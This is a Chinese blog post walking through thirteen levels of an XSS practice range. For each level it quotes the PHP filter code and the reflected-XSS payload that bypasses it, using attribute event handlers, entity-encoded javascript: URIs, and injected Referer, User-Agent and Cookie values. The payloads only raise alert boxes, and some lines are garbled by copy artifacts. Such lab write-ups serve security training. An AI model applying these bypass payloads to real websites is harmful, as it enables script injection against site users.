xss靶场在线靶场

最新推荐文章于 2025-03-22 01:47:34 发布
原创 最新推荐文章于 2025-03-22 01:47:34 发布
· 1k 阅读 · 1 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #php #javascript

1、普通
window.alert = function()
http://test.ctf8.com/level1.php?name=

2、value

http://test.ctf8.com/level2.php?keyword="><!–

3、被转义
htmlspecialchars把预定义的字符 “<” (小于)和 “>” (大于)转换为 HTML 实体
& (和号)成为 &
“ (双引号)成为 ”
’ (单引号)成为 ’
> (大于)成为 >
< (小于)成为 <
要把特殊的 HTML 实体转换回字符,请使用 htmlspecialchars_decode() 函数

onfocus #当 input 输入框获取焦点时执行一段 Javascript代码
http://test.ctf8.com/level3.php?keyword=’ οnfοcus=alert(‘ok’)//
http://test.ctf8.com/level3.php?keyword=1’ οnclick=alert(‘ok’)//
http://test.ctf8.com/level3.php?keyword=1’ οnclick=‘alert(1)’

4、被转义后加了括号
$str2=str_replace(“>”,“”,$str);
$str3=str_replace(“<”,“”,$str2);

<input name=keyword value=“‘.$str3.’”>
http://test.ctf8.com/level4.php?keyword=1" οnclick=alert(1)//

5、过滤
s t r = s t r t o l o w e r ( str = strtolower( str=strtolower(_GET[“keyword”]); #把所有字符转换为小写
s t r 2 = s t r r e p l a c e ( " < s c r i p t " , " < s c r i p t " , str2=str_replace("<script","<scr_ipt", str2=strreplace("<script","<script",str);
s t r 3 = s t r r e p l a c e ( " o n " , " o n " , str3=str_replace("on","o_n", str3=strreplace("on","on",str2);
<input name=keyword value=“‘.$str3.’”>
http://test.ctf8.com/level5.php?keyword=text"><a href="javascript:alert(1)

6、过滤
$str2=str_replace(“<script”,“<scr_ipt”,$str);
$str3=str_replace(“on”,“o_n”,$str2);
$str4=str_replace(“src”,“sr_c”,$str3);
$str5=str_replace(“data”,“da_ta”,$str4);
$str6=str_replace(“href”,“hr_ef”,$str5);

<input name=keyword value=“‘.$str6.’”>
http://test.ctf8.com/level6.php?keyword=http://test.ctf8.com/level6.php?keyword=1" oNcliCk=alert(1)//

7、过滤
ini_set(“display_errors”, 0);
$str =strtolower( $_GET[“keyword”]);
$str2=str_replace(“script”,“”,$str);
$str3=str_replace(“on”,“”,$str2);
$str4=str_replace(“src”,“”,$str3);
$str5=str_replace(“data”,“”,$str4);
$str6=str_replace(“href”,“”,$str5);

<input name=keyword value=“‘.$str6.’”>
http://test.ctf8.com/level7.php?keyword=keyword=1" oonNcliCk=alert(1)//

8、
ini_set(“display_errors”, 0);
$str = strtolower($_GET[“keyword”]);
$str2=str_replace(“script”,“scr_ipt”,$str);
$str3=str_replace(“on”,“o_n”,$str2);
$str4=str_replace(“src”,“sr_c”,$str3);
$str5=str_replace(“data”,“da_ta”,$str4);
$str6=str_replace(“href”,“hr_ef”,$str5);
$str7=str_replace(‘"’,‘&quot’,$str6);

<input name=keyword value=“‘.htmlspecialchars($str).’”>

echo ‘<center><BR><a href="’.$str7.‘">友情链接</a></center>’;
javasc&#x72ipt:alert(111)
&#x72为r转码后 javascript:alert(1),页面是识别ASCLL码的,遇到value="a"过滤可以直接尝试转码http://www.jsons.cn/ascii/

9、
ini_set(“display_errors”, 0);
$str = strtolower($_GET[“keyword”]);
$str2=str_replace(“script”,“scr_ipt”,$str);
$str3=str_replace(“on”,“o_n”,$str2);
$str4=str_replace(“src”,“sr_c”,$str3);
$str5=str_replace(“data”,“da_ta”,$str4);
$str6=str_replace(“href”,“hr_ef”,$str5);
$str7=str_replace(‘"’,‘&quot’,$str6);

<input name=keyword value="'.htmlspecialchars( s t r ) . ′ " > i f ( f a l s e = = = s t r p o s ( str).'"> if(false===strpos( str).">if(false===strpos(str7,‘http://’))
javasc&#x72ipt:http://www.0aa.me%0dalert(‘ok’)
javasc&#x72ipt:http://%0dalert(123)

10、F12
ini_set(“display_errors”, 0);
$str = $_GET[“keyword”];
$str11 = $_GET[“t_sort”];
$str22=str_replace(“>”,“”,$str11);
$str33=str_replace(“<”,“”,$str22);

<input name=“t_sort” value=“‘.$str33.’” type=“hidden”>
<input name=“t_sort” value=“123” type=“text” οnclick=alert(1)>

11、F12、捕包
ini_set(“display_errors”, 0);
$str = $_GET[“keyword”];
$str00 = $_GET[“t_sort”];
$str11=$_SERVER[‘HTTP_REFERER’];
$str22=str_replace(“>”,“”,$str11);
$str33=str_replace(“<”,“”,$str22);

<input name=“t_ref” value=“‘.$str33.’” type=“hidden”>
<input name=“t_ref” value=“http://test.ctf8.com/level10.php?1
%22%20oNcliCk=alert(1)//” type=“text” οnclick=alert(1) >
Referer: " type=“text” οnclick="alert(1)

12、F12、捕包
ini_set(“display_errors”, 0);
$str = $_GET[“keyword”];
$str00 = $_GET[“t_sort”];
$str11=$_SERVER[‘HTTP_USER_AGENT’];
$str22=str_replace(“>”,“”,$str11);
$str33=str_replace(“<”,“”,$str22);

<input name=“t_ua” value=“‘.$str33.’” type=“hidden”>
<input name=“t_ua” value=“Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0” type=“text” οnclick=alert(1) >

13、F12、捕包
ini_set(“display_errors”, 0);
$str = $_GET[“keyword”];
$str00 = $_GET[“t_sort”];
$str11=$_COOKIE[“user”];
$str22=str_replace(“>”,“”,$str11);
$str33=str_replace(“<”,“”,$str22);

<input name=“t_cook” value=“‘.$str33.’” type=“hidden”>
<input name=“t_cook” value=“call me maybe?” type=“text” οnclick=alert(1) >

XSS线上靶场---Warmups
qq_52016943的博客
08-01 2617
XSS线上靶场
XSS线上靶场---haozi
qq_52016943的博客
07-29 1420
XSS 在线靶场
XSS简单在线靶场
qq_51979295的博客
09-19 755
反射型xss在线靶场通关
XSS漏洞靶场---(复现)
最新发布
wa10111213的博客
03-22 1029
在这段代码中,$str 变量接收用户输入的 keyword 参数,经过一系列处理后存储在 $str3 中,而 $str3 被直接嵌入到 HTML 表单的 input 标签的 value 属性中,没有进行足够的 HTML 实体转义,这就为 XSS 攻击提供了可能。虽然在 <h2> 标签中使用了 htmlspecialchars 对输出进行转义,但在 <input> 标签的 value 属性中,使用的是经过 str_replace 处理后的 $str3,没有再次进行全面的转义,这就给攻击者留下了可乘之机。
XSS线上靶场---prompt
qq_52016943的博客
07-30 1203
XSS prompt
XSS Game靶场练习
qq_64338246的博客
08-17 1194
虽然这里又用了innerHTML,但是过滤了括号会导致无法触发函数,所以不能像第一关那样直接用img标签。这里用双引号闭合,让jeff=aaa正常执行(aaa可以换成别的),然后在后面继续执行弹出1337的命令。用location把编码的符号变成字符串,然后再用括号的替代品如%2528和%2529来进行绕过。实际操作时可以看到,网页在加载完成后,经过两秒会再加载一次,这里就是在进行submit的提交。这一关依旧是get传参,只是多了一个submit提交事件,配合定时器在两秒后自动提交。
WEB常见漏洞之XSS(靶场篇)
One-Fox安全团队的博客
06-30 2337
由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!
网络安全之XSS靶场
huizhaohaha的博客
08-18 1485
可以看到,我们通过url传递参数,传递了两个,一个src =1,一个onerror,最后保留下来了onerror参数,那这是什么原理呢,我们可以根据这个进行猜测,那就是,在这个循环删除完第一个参数的时候,指针网第二个参数走,但是由于,第一个参数没有数据了,我的传递的第二个参数向前走了一步,也就是到达了第一个参数的位置,而现在指针指的位置为空了,删不删的无所谓了,那么依据我们的分析,我们传递的参数可以保留偶数的参数,奇数参数都将会被删除,那么我们可以试一试看看我们的猜测是否正确。
网络安全之xss靶场练习
bb_lo的博客
08-18 1355
靶场地址页面显示如下。
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程_xss靶场level
2401_84186109的博客
04-30 816
3)第三步:弹窗测试,回车即可弹窗,自动进入下一关。4)从源码可以看到,第一关没有任何过滤。​​​​​​​​。
XSS漏洞-02】XSS靶场介绍(含BlueLotus_XSSReceiver、DVWA、XSS-labs等)
m0_64378913的博客
05-13 2642
1 XSS靶场简介 XSS-labs:一款以练习测试XSS思路和命令的闯关游戏,主要是以反射型XSS漏洞为主。 DVWA:一个功能较全的靶场环境,漏洞类型齐全,包含在XSS三种类型的漏洞,各有4个级别的破解难度。 BlueLotus_XSSReceiver:该源码是由清华大学蓝莲花战队的firesun编写,安装方便,功能强大。 2 DVWA靶场搭建过程 方法一:可以参考《Docker上搭建DVWA漏洞环境》。安装简单,但安装结果功能有所欠缺。 方法二:可以参考《WAMP环境+DVWA漏洞测试平台搭建过程》。
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射型XSS、存储型XSS和DOM型XSS三个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
XSS-labs靶场
Vi_vids的博客
03-10 524
xss-labs靶场 Less-01 对于XSS漏洞,在实战中未避免因关键字被发现,多采用h5标签进行试探。 可以判断存在xss注入; 或者使用另一种payload Less-02
XSS靶场
weixin_53860392的博客
03-08 895
1.
Xss.haozi在线练习靶场1-19关(带答案及靶场地址)
2301_78238055的博客
08-22 1043
一个在线XSS练习靶场19关全带通关答案
XSS漏洞:xss.haozi.me靶场通关
qq_68163788的博客
01-18 3028
xss.haozi.me是一个专门用于测试和学习跨站脚本(XSS)漏洞的靶场XSS漏洞是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,可以获取用户的敏感信息,如Cookie、会话令牌等。 通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞,并完成了相应的任务。在这个过程中,你需要利用各种XSS漏洞,包括反射型XSS、存储型XSS等,来实现跨站脚本攻击,并获取相应的flag或者完成指定的任务。 通过通关xss.haozi.me靶场,你可以提升自己的Web安全技能,了解XSS
xss.haozi.me靶场详解
m0_46467017的博客
07-28 2745
由于xss.haozi.me是一个在线靶场,服务部署在Github,若网速不好,则需要科学上网。由于本靶场是一个白盒测试的靶场,我们可以看到代码的源码,所以可以直接根据源码的限制的条件来思考如何绕过。...
XSS-labs 靶场通关总结(下)
m0_61506558的博客
08-12 432
原理。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络坤子-蔡先生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值